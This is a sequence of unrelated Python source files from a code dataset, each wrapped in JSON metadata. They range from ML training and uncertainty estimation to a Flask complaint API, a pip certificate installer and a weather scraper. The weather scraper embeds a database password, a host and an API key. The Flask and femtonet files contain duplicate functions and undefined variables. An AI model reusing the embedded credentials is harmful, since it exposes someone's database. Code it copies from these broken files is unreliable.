frame.shape[1]-1)]\r\n \r\n # Tạo các đốm màu 4 chiều và chuyển các đốm màu để nhận dạng Giới tính và Tuổi\r\n blob=cv2.dnn.blobFromImage(face, 1.0, (227,227), MODEL_MEAN_VALUES, swapRB=False)\r\n genderNet.setInput(blob)\r\n genderPreds=genderNet.forward()\r\n gender=genderList[genderPreds[0].argmax()]\r\n print(f'Gender: {gender}')\r\n\r\n ageNet.setInput(blob)\r\n agePreds=ageNet.forward()\r\n age=ageList[agePreds[0].argmax()]\r\n print(f'Age: {age[1:-1]} years')\r\n\r\n cv2.putText(resultImg, f'{gender}, {age}', (faceBox[0], faceBox[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2, cv2.LINE_AA)\r\n cv2.imshow(\"Detecting age and gender\", resultImg)\r\n","sub_path":"agepic.py","file_name":"agepic.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"130568082","text":"# coding: utf-8\nimport re\nfrom csv import DictReader, DictWriter\n\n\nphone_re = re.compile(r'[\\d\\(\\)\\-]*')\n\ndef clear_phone(phone_text):\n replace_map = {\n '(': '(',\n ')': ')',\n '—': '-',\n '-': '-',\n '?': '',\n '?': '',\n }\n for k,v in replace_map.items():\n phone_text = phone_text.replace(k, v)\n phone = ''.join(phone_re.findall(phone_text))\n return phone\n\nreader = open('lawtime.csv')\nwriter = open('lawtime.new.csv', 'w')\n\nfor line in reader.readlines():\n phone = clear_phone(line)\n writer.write(phone + '\\n')\nreader.close()\nwriter.close()\n#\n# print clear_phone('012-8388399')\n# print clear_phone('(012)-8388399')\n# print clear_phone('(012)-8388399')\n# print clear_phone('012订单(8388399)')\n# print clear_phone('012-8388399add大家的积极')","sub_path":"test_re_replace.py","file_name":"test_re_replace.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"363327309","text":"from dataset import PlantDiseaseDataset, SetType, CLASS_MAP\nimport sys\nimport torch.nn as nn\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nfrom cnn import PlantDiseaseNet\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\n\nclass PlantDiseaseTrainer:\n def __init__(self, model_name: str, epochs: int):\n self.output_filename = model_name + \".pth\"\n self.epochs = epochs\n self.train_set = PlantDiseaseDataset(SetType.train, shuffle=True)\n self.train_loader = DataLoader(\n self.train_set, batch_size=128, shuffle=True, num_workers=12\n )\n\n self.test_set = PlantDiseaseDataset(SetType.test)\n self.test_loader = DataLoader(\n self.test_set, batch_size=128, shuffle=False, num_workers=1\n )\n\n self.val_set = PlantDiseaseDataset(SetType.val, shuffle=True)\n self.val_loader = DataLoader(\n self.val_set, batch_size=64, shuffle=False, num_workers=12\n )\n\n self.config = {\n \"starting_lr\": 1e-3,\n \"momentum\": 0.9,\n \"decay\": 5e-4,\n \"patience\": 15,\n \"lr_factor\": 0.3,\n \"print_cadence\": 100,\n }\n\n self.device = torch.device(\"cuda:0\")\n self.net = PlantDiseaseNet().to(self.device)\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = optim.Adam(\n self.net.parameters(),\n lr=self.config[\"starting_lr\"],\n weight_decay=self.config[\"decay\"],\n )\n self.scheduler = ReduceLROnPlateau(\n self.optimizer,\n factor=self.config[\"lr_factor\"],\n mode=\"max\",\n verbose=True,\n patience=self.config[\"patience\"],\n )\n\n self.writer = SummaryWriter(f\"{model_name}_logs\")\n\n for ds in [self.train_set, self.test_set, self.val_set]:\n print(f\"Size of datasets: {len(ds)}\")\n print(\"Trainer Initialized.\")\n\n def train(self):\n log_iter = 0\n for epoch in range(self.epochs):\n running_loss = 0.0\n for i, (inputs, labels, meta) in enumerate(self.train_loader):\n self.net.train()\n self.optimizer.zero_grad()\n outputs = self.net(inputs.float().to(self.device))\n loss = self.criterion(outputs, labels.long().to(self.device))\n loss.backward()\n self.optimizer.step()\n running_loss += loss.item()\n if i > 0 and i % self.config[\"print_cadence\"] == 0:\n mean_loss = running_loss / self.config[\"print_cadence\"]\n self.writer.add_scalar(\"Train/MRLoss\", mean_loss, log_iter)\n print(f\"Epoch: {epoch}\\tBatch: {i}\\tLoss: {mean_loss}\")\n running_loss = 0.0\n log_iter += 1\n\n train_acc = self.log_metrics(epoch, \"Train\")\n self.log_metrics(epoch, \"Validation\")\n self.scheduler.step(train_acc)\n acc = self.calculate_accuracy(self.test_loader)\n self.writer.add_text(\"Test/Accuracy\", f\"{acc}\")\n\n def log_metrics(self, epoch, label):\n loader = self.val_loader if label == \"Validation\" else self.train_loader\n acc = self.calculate_accuracy(loader)\n self.writer.add_scalar(f\"{label}/Accuracy\", acc, epoch)\n return acc\n\n def calculate_accuracy(self, loader: DataLoader):\n with torch.no_grad():\n self.net.eval()\n correct = 0.0\n total = 0.0\n for inputs, labels, metadata in loader:\n outputs = self.net(inputs.float().to(self.device))\n _, preds = outputs.detach().cpu().max(1)\n total += labels.size(0)\n correct += preds.eq(labels.float()).sum().item()\n print(f\"Correct:\\t{correct}, Incorrect:\\t{total-correct}\")\n return correct / total\n\n\nif __name__ == \"__main__\":\n trainer = PlantDiseaseTrainer(sys.argv[1], 425)\n trainer.train()\n torch.save(trainer.net.state_dict(), trainer.output_filename)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"450951711","text":"x = int(input())\nif x == 2: \n print(2)\n exit()\nwhile True:\n for i in range(2, int(-(-x**0.5//1))+1):\n if x%i == 0:\n break\n else:\n print(x)\n break\n x+=1","sub_path":"2_kakomon/abc126-211/abc149_c.py","file_name":"abc149_c.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"221819470","text":"# coding:utf-8\nimport sys\nimport json\n\nfrom PyQt5.QtWidgets import QApplication\nfrom View.album_interface.album_info_bar import AlbumInfoBar\nfrom View.playlist_interface.playlist_info_bar import PlaylistInfoBar\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n with open(\"Playlists/aiko.json\", encoding=\"utf-8\") as f:\n playlist = json.load(f)\n # w = PlaylistInfoBar(playlist)\n\n with open(\"data/songInfo.json\", encoding=\"utf-8\") as f:\n songInfo_list = json.load(f)[:20]\n albumInfo = {\n \"singer\": \"鎖那\",\n \"genre\": \"POP流行\",\n \"year\": \"2016年\",\n \"album\": \"Hush a by little girl\",\n \"coverPath\": \"Album_Cover/鎖那_Hush a by little girl/鎖那_Hush a by little girl.jpg\",\n \"songInfo_list\": songInfo_list\n }\n w = AlbumInfoBar(albumInfo)\n w.show()\n sys.exit(app.exec_())\n","sub_path":"tests/test_collapsing_app_bar.py","file_name":"test_collapsing_app_bar.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"350789976","text":"#!/usr/bin/enb python3\r\n\r\nimport os\r\nimport sys\r\nimport traceback\r\nimport shutil\r\nimport requests\r\n\r\nin_dir = os.path.join(os.path.dirname(sys.executable), \"ca-bundle.crt\")\r\npip_dir = os.path.join(os.getenv(\"Appdata\"), \"pip\")\r\n\r\nif not os.path.isdir(pip_dir):\r\n os.mkdir(pip_dir)\r\n\r\npath = os.path.join(pip_dir, \"ca-bundle.crt\")\r\n\r\ntry:\r\n print(\"patch: downloading mozilla CA certificates...\")\r\n answer = requests.get(\"https://curl.haxx.se/ca/cacert.pem\", stream=True)\r\n print(\"patch: installing downloaded certificates\")\r\n \r\n with open(path, \"wb\") as file:\r\n for chunk in answer.iter_content(chunk_size=1024):\r\n if chunk:\r\n file.write(chunk)\r\n os.system(\"pip.exe config set global.cert {0}\".format(path))\r\nexcept requests.exceptions.ConnectionError:\r\n print(\"patch: certificates loading failed\")\r\n print(\"patch: installing cached certificates\")\r\n shutil.move(in_dir, path)\r\n os.system(\"pip.exe config set global.cert {0}\".format(path))\r\nexcept Exception:\r\n traceback.print_exc()","sub_path":"src/console/patch/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"593656857","text":"from flask import Flask, jsonify, abort, make_response, request\nNOT_FOUND = 'Not found'\nBAD_REQUEST = 'Bad request'\napp = Flask(__name__)\nusers = [\n {\n \"id\":1,\n \"firstname\":\"STEPHEN\",\n \"lastname\":\"MWANIKA\",\n \"othernames\":\"CRISPIN\",\n \"email\":\"stephenmwanika@gmail.com\",\n \"phoneNumber\":\"+256774607130\",\n \"username\":\"stephenmwanika\",\n \"registered\":\"YES\",\n \"isAdmin\":\"YES\",\n },\n {\n \"id\":2,\n \"firstname\":\"JUSTINE\",\n \"lastname\":\"AKOTH\",\n \"othernames\":\"PROSCOVIA\",\n \"email\":\"\",\n \"phoneNumber\":\"\",\n \"username\":\"ajustine\",\n \"registered\":\"YES\",\n \"isAdmin\":\"NO\",\n },\n]\n\nredflags = [\n {\n \"id\": 1,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"ATHIENO\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 2,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"NYAMIEL\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 3,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"MWANIKA\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 4,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"AKOTH\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 5,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"OLWENY\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 6,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"ACHIENG\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 7,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"ALOWO\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n {\n \"id\": 8,\n \"createdOn\": '21-Aug-18',\n \"createdBy\": \"NYAPENDI\",\n \"Type\":\"red-flag\",\n \"location\":\"\",\n \"status\":\"under investigation\",\n \"images\":\"\",\n \"videos\":\"\",\n \"comment\":\"\",\n },\n]\n\ndef _get_redflag(id):\n return [redflag for redflag in redflags if redflag['id'] == id]\n\ndef _record_exists(createdBy):\n return [redflag for redflag in redflags if redflag[\"createdBy\"] == createdBy]\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': NOT_FOUND}), 404)\n\n@app.errorhandler(400)\ndef bad_request(error):\n return make_response(jsonify({'error': BAD_REQUEST}), 400)\n\n@app.route('/api/v1/redflags', methods=['GET'])\ndef get_redflags():\n return jsonify({'redflags': redflags})\n\n@app.route('/api/v1/redflags/', methods=['GET'])\ndef get_redflag(id):\n redflag = _get_redflag(id)\n if not redflag:\n abort(404)\n return jsonify({'redflags': redflag})\n\n@app.route('/api/v1/redflags', methods=['POST'])\ndef create_redflag():\n if not request.json or 'createdBy' not in request.json:\n abort(400)\n redflag_id = redflags[-1].get(\"id\") + 1\n createdBy = request.json.get('createdBy')\n if _record_exists(createdBy):\n abort(400)\n \n redflag = {\n \"id\": redflag_id, \"createdOn\": createdOn, \"createdBy\": createdBy,\n \"Type\": Type, \"location\": location, \"status\": status,\n \"Images\":Images, \"videos\": videos, \"comment\": comment\n }\n redflags.append(redflag)\n return jsonify({'redflag': redflag}), 201\n\n@app.route('/api/v1/redflags//location', methods=['PATCH'])\ndef edit_redflag(id):\n redflag = _get_redflag(id)\n if len(redflag) == 0:\n abort(404)\n if not request.json:\n abort(400)\n createdOn = request.json.get('createdOn', redflag[0]['createdOn'])\n createdBy = request.json.get('createdBy', redflag[0]['createdBy'])\n Type = request.json.get('Type', redflag[0]['Type'])\n location = request.json.get('location', redflag[0]['location'])\n status = request.json.get('status', redflag[0]['status'])\n Images = request.json.get('Images', redflag[0]['Images'])\n Videos = request.json.get('Videos', redflag[0]['Videos'])\n comment = request.json.get('comment', redflag[0]['comment'])\n \n redflag[0]['createdOn'] = createdOn\n redflag[0]['createdBy'] = createdBy\n redflag[0]['Type'] = Type\n redflag[0]['location'] = location\n redflag[0]['status'] = status\n redflag[0]['Images'] = Images\n redflag[0]['Videos'] = Videos\n redflag[0]['comment'] = comment\n return jsonify({'redflag': redflag[0]}), 200\n\n@app.route('/api/v1/redflags//comment', methods=['PATCH'])\ndef edit_redflag(id):\n redflag = _get_redflag(id)\n if len(redflag) == 0:\n abort(404)\n if not request.json:\n abort(400)\n createdOn = request.json.get('createdOn', redflag[0]['createdOn'])\n createdBy = request.json.get('createdBy', redflag[0]['createdBy'])\n Type = request.json.get('Type', redflag[0]['Type'])\n location = request.json.get('location', redflag[0]['location'])\n status = request.json.get('status', redflag[0]['status'])\n Images = request.json.get('Images', redflag[0]['Images'])\n Videos = request.json.get('Videos', redflag[0]['Videos'])\n comment = request.json.get('comment', redflag[0]['comment'])\n \n redflag[0]['createdOn'] = createdOn\n redflag[0]['createdBy'] = createdBy\n redflag[0]['Type'] = Type\n redflag[0]['location'] = location\n redflag[0]['status'] = status\n redflag[0]['Images'] = Images\n redflag[0]['Videos'] = Videos\n redflag[0]['comment'] = comment\n return jsonify({'redflag': redflag[0]}), 200\n \n@app.route('/api/v1/redflags/', methods=['DELETE'])\ndef delete_redflag(id):\n redflag = _get_redflag(id)\n if len(redflag) == 0:\n abort(404)\n redflags.remove(redflag[0])\n return jsonify({}), 204\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"542857501","text":"import f_eqa2utm\nimport pandas as pd\n\n# read csv\ndataFolder = \"C:/Users/niedo/OneDrive/SL/2022/202206MongoliaSurvey/PreliminaryStudy/GPX\"\ndata_csv = pd.read_csv(dataFolder + \"/Grid240_ponits_coordinate.csv\")\n\n# make blank data frame for the result\ncols = ['x', 'y']\nresult_df = pd.DataFrame(index=[], columns=cols)\n\nfor row in data_csv.itertuples():\n # print(row.y)\n utm_result = f_eqa2utm.eqa2Utm(lon=row.y, lat=row.x, zone = False) \n \n utm_record = pd.DataFrame({'x': utm_result[1], 'y': utm_result[0]}, index = ['1'])\n # print(utm_record)\n result_df = pd.concat([result_df, utm_record], ignore_index=True)\n\n# print(data_csv)\n# utm_result = utm2eqa.utm2Epa(lon=105.93856674505157, lat=46.88053214466702) #[deg.]\n# print(result_df)\nresult_df.to_csv(dataFolder + '/Grid240_ponits_coordinateUTM.csv',index=False)","sub_path":"Coord_UTM/e_someeqa2utm.py","file_name":"e_someeqa2utm.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"374260858","text":"import sys\nimport asyncio\nimport aiohttp\nimport nest_asyncio\n\nimport pandas as pd\nimport numpy as np\n\nfrom femtonet.api.cubedata import CubeData\n\nclass FemtoNetAPI:\n def __init__(self):\n self.api_base_url = 'http://femtography.uvadcos.io/api/'\n self.cube_data = CubeData()\n\n def _api_async(func):\n \"\"\" Decorator used to generate an asynchronous request\n\n Args:\n func (async function): An asynchronous API request function.\n\n Returns:\n CubeData: A custom data class containing a list of columns and a Pandas DataFrame with the requested GPD information.\n \n \"\"\"\n def request_wrapper(self, *args, **kwargs):\n if 'ipykernel' in sys.modules:\n try:\n loop = asyncio.get_running_loop()\n except RuntimeError:\n loop = asyncio.new_event_loop()\n loop.run_until_complete(self._to_task(func(self, *args, **kwargs), True, loop))\n else:\n nest_asyncio.apply(loop)\n return asyncio.run(self._to_task(func(self, *args, **kwargs), True, loop))\n\n else:\n return asyncio.run(func(self, *args, **kwargs))\n \n return request_wrapper\n\n @_api_async\n async def data_query(self, model:str, gpd:str, xbj:float, t:float, qs:float):\n async with aiohttp.ClientSession() as session:\n url = self.api_base_url = 'http://femtography.uvadcos.io/api/{model}/{gpd}/{xbj}/{t}/{qs}'.format(model=model, gpd=gpd.upper(), xbj=xbj, t=t, qs=qs)\n \n async with session.get(url) as resp:\n print(''.format(model=model, gpd=gpd.upper(), xbj=_xbj, t=_t, qs=qs))\n response = await resp.json(content_type='text/html')\n return self._set_data_cube(response)\n\n\n def _to_task(self, future, as_task, loop):\n return loop.create_task(future)\n\n def _set_data_cube(self, response):\n self.cube_data.data = pd.DataFrame.from_dict(response)\n self.cube_data.columns = self.cube_data.data.columns\n\n return self.cube_data\n\n def _find_nearest_value(self, data:np.array, value:float)->int:\n index = np.abs(data - value).argmin()\n return data[index]\n \n \n","sub_path":"femtonet/api/femtoapi.py","file_name":"femtoapi.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"284609262","text":"import matplotlib.pyplot as plt \nimport numpy as np \nfrom matplotlib import style\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import axes3d\n\nkota=[] ; th2015=[] ; th2016=[]\nplt.figure('3D Plotting',figsize=(10,5))\ncustom=plt.subplot(111,projection='3d')\ndef print3D():\n data=open(\"rokok.csv\").read()\n baris=data.split('\\n')\n for isidata in baris:\n x,y,z=isidata.split(',')\n kota.append(x)\n th2015.append(float(y))\n th2016.append(float(z))\n kota.remove(kota[0]);th2015.remove(th2015[0]);th2016.remove(th2016[0])\n xalas = np.arange(0,len(kota))\n yalas = np.repeat(0.5,len(kota))\n zalas = np.zeros(len(kota))\n xdinding = np.ones(len(kota))\n ydinding = np.ones(len(kota))\n zdinding = np.array(th2015)\n custom.bar3d(xalas,yalas,zalas,xdinding,ydinding,zdinding,color=['r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c','k','w','r','g','b','c']) #bisa beri color tiap bar, color=[]\n # custom.set_xlabel('Nilai X')\n plt.xticks(xalas,kota,rotation=90)\n custom.set_ylabel('Nilai Y')\n custom.set_ylim(0,10)\n custom.set_zlabel('Nilai Z')\n plt.show()\n\nprint3D()","sub_path":"belajar numpy/3adji.py","file_name":"3adji.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"257757712","text":"import numpy as np\nimport torch\nfrom .masks import build_mask\n\n\nclass MCDUE:\n \"\"\"\n Estimate uncertainty for samples with MCDUE approach\n \"\"\"\n def __init__(self, net, nn_runs=25, dropout_rate=.5):\n self.net = net\n self.nn_runs = nn_runs\n self.dropout_rate = dropout_rate\n\n def estimate(self, X_pool, *args):\n mcd_realizations = np.zeros((X_pool.shape[0], self.nn_runs))\n\n with torch.no_grad():\n for nn_run in range(self.nn_runs):\n prediction = self.net(X_pool, dropout_rate=self.dropout_rate)\n mcd_realizations[:, nn_run] = np.ravel(prediction.to('cpu'))\n\n return np.ravel(np.std(mcd_realizations, axis=1))\n\n\nclass MCDUEMasked:\n \"\"\"\n Estimate uncertainty for samples with MCDUE approach\n \"\"\"\n def __init__(self, net, nn_runs=25, dropout_rate=.5, dropout_mask=None, keep_runs=False):\n self.net = net\n self.nn_runs = nn_runs\n self.dropout_rate = dropout_rate\n if isinstance(dropout_mask, str):\n dropout_mask = build_mask(dropout_mask)\n self.dropout_mask = dropout_mask\n self.keep_runs = keep_runs\n self._mcd_runs = np.array([])\n\n def estimate(self, X_pool, *args):\n mcd_runs = np.zeros((X_pool.shape[0], self.nn_runs))\n\n with torch.no_grad():\n # Some mask needs first run without dropout, i.e. decorrelation mask\n if hasattr(self.dropout_mask, 'dry_run') and self.dropout_mask.dry_run:\n self.net(X_pool, dropout_rate=self.dropout_rate, dropout_mask=self.dropout_mask)\n\n # Get mcdue estimation\n for nn_run in range(self.nn_runs):\n prediction = self.net(\n X_pool, dropout_rate=self.dropout_rate, dropout_mask=self.dropout_mask\n ).to('cpu')\n mcd_runs[:, nn_run] = np.ravel(prediction)\n\n if self.keep_runs:\n self._mcd_runs = mcd_runs\n\n return np.ravel(np.std(mcd_runs, axis=1))\n\n def reset(self):\n if hasattr(self.dropout_mask, 'reset'):\n self.dropout_mask.reset()\n\n def last_mcd_runs(self):\n \"\"\"Return model prediction for last uncertainty estimation\"\"\"\n if not self.keep_runs:\n print(\"mcd_runs: You should set `keep_runs=True` to properly use this method\")\n return self._mcd_runs\n\n\n\n\n\n","sub_path":"2020/alpaca-master stat-mlalpaca/alpaca/uncertainty_estimator/mcdue.py","file_name":"mcdue.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"100087257","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 4 21:15:10 2018\r\n\r\n@author: shash\r\n\"\"\"\r\n\r\nd={}\r\nt={}\r\nd[1]=[False,4,10]\r\nd[2]=[False,8]\r\nd[3]=[False,6]\r\nd[4]=[False,7]\r\nd[5]=[False,2]\r\nd[6]=[False,9]\r\nd[7]=[False,1]\r\nd[8]=[False,5,6]\r\nd[9]=[False,3,7]\r\nd[10]=[False,4,11]\r\nd[11]=[False,12]\r\nd[12]=[False,10]\r\ntime=0\r\ntimelash=[0]*13\r\ndef DFS(graph,vertex):\r\n global time\r\n (graph[vertex])[0]=True\r\n try:\r\n neighbours=(graph[vertex])[1:]\r\n except:\r\n neighbours=[]\r\n for neighbour in neighbours:\r\n if (graph[neighbour])[0]==False:\r\n try:\r\n DFS(graph,neighbour)\r\n except:\r\n print(\"JINGALLALAH\")\r\n time+=1\r\n timelash[vertex]=time\r\n if neighbours==[] :\r\n return\r\n\r\nDFS(d,2)\r\ni=1\r\norder=[]\r\nfor key in d:\r\n print(\"Timelash for {} is {} \".format(key,timelash[i]))\r\n order.append((timelash[i],key))\r\n i+=1 \r\nprint(order)\r\norder.sort()\r\nprint(order)\r\ntimelash=[0]*13\r\n\r\nd[1]=[False,7]\r\nd[2]=[False,5]\r\nd[3]=[False,9]\r\nd[4]=[False,1,10]\r\nd[5]=[False,8]\r\nd[6]=[False,3,8]\r\nd[7]=[False,4,9]\r\nd[8]=[False,2]\r\nd[9]=[False,6] \r\nd[10]=[False,1,12] \r\nd[11]=[False,10]\r\nd[12]=[False,11]\r\nfor o in order:\r\n timelash=[0]*13\r\n if d[o[1]][0]==False:\r\n DFS(d,o[1])\r\n q=len(timelash)-timelash.count(0)\r\n print(q)\r\n","sub_path":"Kosaraju-s Algorithm - Strongly Connected Components - Using Directional DFS/untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"430269397","text":"from sqlalchemy import create_engine\nfrom six.moves.urllib.request import urlopen\nimport json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nimport time\n\ndef get_data():\n \"\"\"Get weather data from openweathermap\"\"\"\n #send a query to the API and decode the bytes it returns\n query = urlopen(\"http://api.openweathermap.org/data/2.5/forecast?id=7778677&units=metric&APPID=6986e64d5d176d1782825a12f2677fe4\").read().decode('utf-8')\n #return the obtained string as a dictionary\n data = json.loads(query)\n df = pd.DataFrame.from_dict(json_normalize(data['list'][0]['weather']), orient='columns')\n for i in range(1,39):\n df1 = pd.DataFrame.from_dict(json_normalize(data['list'][i]['weather']), orient='columns')\n df = df.append(df1, ignore_index=True)\n #df = pd.DataFrame(data['list']['dt_txt'])\n df2 = pd.DataFrame.from_dict(json_normalize(data['list']), orient='columns')\n dataframe = pd.concat([df, df2], axis=1)\n return dataframe[['dt_txt','main']]\n\ndef save_data_to_db(dataframe):\n #Assigning the engine variable values\n engine = create_engine(\"mysql+pymysql://Group8:COMP30670@dublinbikes-rse.c3hjycqhuxxq.eu-west-1.rds.amazonaws.com:3306/DublinBikes\")\n #Creating the connection with the database\n conn = engine.connect()\n #passing into scrapper functions\n #Replaces the real time info in the RealTime table in the Amazon RDS database every 2 mins\n dataframe.to_sql(name='WeatherPredictor',con=conn, if_exists='replace', index=False)\n conn.close()\n\n\nwhile True:\n data = get_data()\n save_data_to_db(data)\n time.sleep(24*60*60)","sub_path":"predictiveWeatherScraper.py","file_name":"predictiveWeatherScraper.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"303553716","text":"# 끝나는 시간이 제일 빠른 것들 중에서 겹치지 않은 수업을 고르면 된다\n# 끝나는 시간이 제일 빠른 순으로 정렬\nn=int(input())\ntime=[list(map(int, input().split())) for _ in range(n)]\ntime.sort(key=lambda x:(x[1], x[0]))\nendtime=time[0][1]\ncount=1\nfor i in range(1, n):\n if time[i][0]>=endtime:\n endtime=time[i][1]\n count+=1\nprint(count)","sub_path":"Greedy/회의실배정.py","file_name":"회의실배정.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"77490644","text":"jedi = {\n \"palacinke\": {\"jajce\": 1, \"mleko\": 0.3, \"moka\": 0.2},\n \"smorn\": {\"jajce\": 1, \"mleko\": 0.3, \"moka\": 0.2},\n \"krompirjev golaz\": {\"krompir\": 2, \"paprika\": 1, \"cebula\": 1},\n \"sataras\": {\"paradiznik\": 1, \"paprika\": 1, \"jajce\": 1, \"cebula\": 1, \"kruh\": 0.2},\n \"hrenovke\": {\"hrenovka\": 1, \"kruh\": 0.2},\n \"makaroni\": {\"makaroni\": 0.2, \"paradiznik\": 0.5, \"meso\": 0.2, \"cebula\": 0.3},\n \"marmelada\": {\"marmelada\": 0.1, \"kruh\": 0.3},\n \"piškot\": {\"piškot\": 2}\n}\n\n\ndef ena_jed(jed, jedcev):\n sestavine = {}\n for sestavina, kolicina in jedi[jed].items():\n sestavine[sestavina] = kolicina * jedcev\n return sestavine\n\n\ndef ena_jed_boljse(jed, jedcev):\n return {sestavina: kolicina * jedcev for sestavina, kolicina in jedi[jed].items()}\n\n\nprint(ena_jed('palacinke', 4))\nprint(ena_jed_boljse('palacinke', 4))\n\nimport collections\n\nobroki = [(\"makaroni\", 20), (\"krompirjev golaz\", 25), (\"hrenovke\", 18),\n (\"sataras\", 18)]\n\n\ndef nakup(obroki):\n sestavine = collections.defaultdict(float)\n for jed, jedcev in obroki:\n for sestavina, kolicina in ena_jed_boljse(jed, jedcev).items():\n sestavine[sestavina] += kolicina\n return sestavine\n\n\nprint(nakup(obroki))\n\nzaloga = {\"jajca\": 10, \"mleko\": 2, \"moka\": 2, \"marmelada\": 2, \"kruh\": 1}\n\n\ndef obrokov(jed, zaloga):\n koliko = None\n for sestavina, kolicina in jedi[jed].items():\n imamo = zaloga.get(sestavina, 0) // kolicina\n if koliko is None or imamo < koliko:\n koliko = imamo\n return koliko\n\n\nprint(obrokov('palacinke', zaloga))\n","sub_path":"05_slovarji, izpeljani seznami/07_jedilniki.py","file_name":"07_jedilniki.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544449177","text":"\"\"\"\nemailverifier.models.Response\n~~~~~~~~~~~~~~~~~~~~~~~\nResponse model which represents service response like an object\n\"\"\"\n\nfrom json import loads\nfrom .audit import Audit\n\n\nclass Response:\n json_string = ''\n\n def __init__(self, json):\n \"\"\"\n Initialise the Response object\n\n :param str json: The json string with service response\n \"\"\"\n self.json_string = json\n\n parsed = loads(json)\n\n self.email_address = parsed['emailAddress'] \\\n if 'emailAddress' in parsed else None\n self.format_check = Response.__convert_to_bool(parsed['formatCheck']) \\\n if 'formatCheck' in parsed else None\n self.smtp_check = Response.__convert_to_bool(parsed['smtpCheck']) \\\n if 'smtpCheck' in parsed else None\n self.dns_check = Response.__convert_to_bool(parsed['dnsCheck']) \\\n if 'dnsCheck' in parsed else None\n self.free_check = Response.__convert_to_bool(parsed['freeCheck']) \\\n if 'freeCheck' in parsed else None\n self.disposable_check = Response.__convert_to_bool(parsed['disposableCheck']) \\\n if 'disposableCheck' in parsed else None\n self.catch_all_check = Response.__convert_to_bool(parsed['catchAllCheck']) \\\n if 'catchAllCheck' in parsed else None\n self.mx_records = parsed['mxRecords'] if 'mxRecords' in parsed else None\n self.audit = Audit(parsed['audit']) if 'audit' in parsed else None\n\n @staticmethod\n def __convert_to_bool(value):\n _val = str(value).lower()\n\n if _val == 'true':\n return True\n if _val == '1':\n return True\n if _val == 'null':\n return None\n\n return False\n\n def __str__(self):\n return 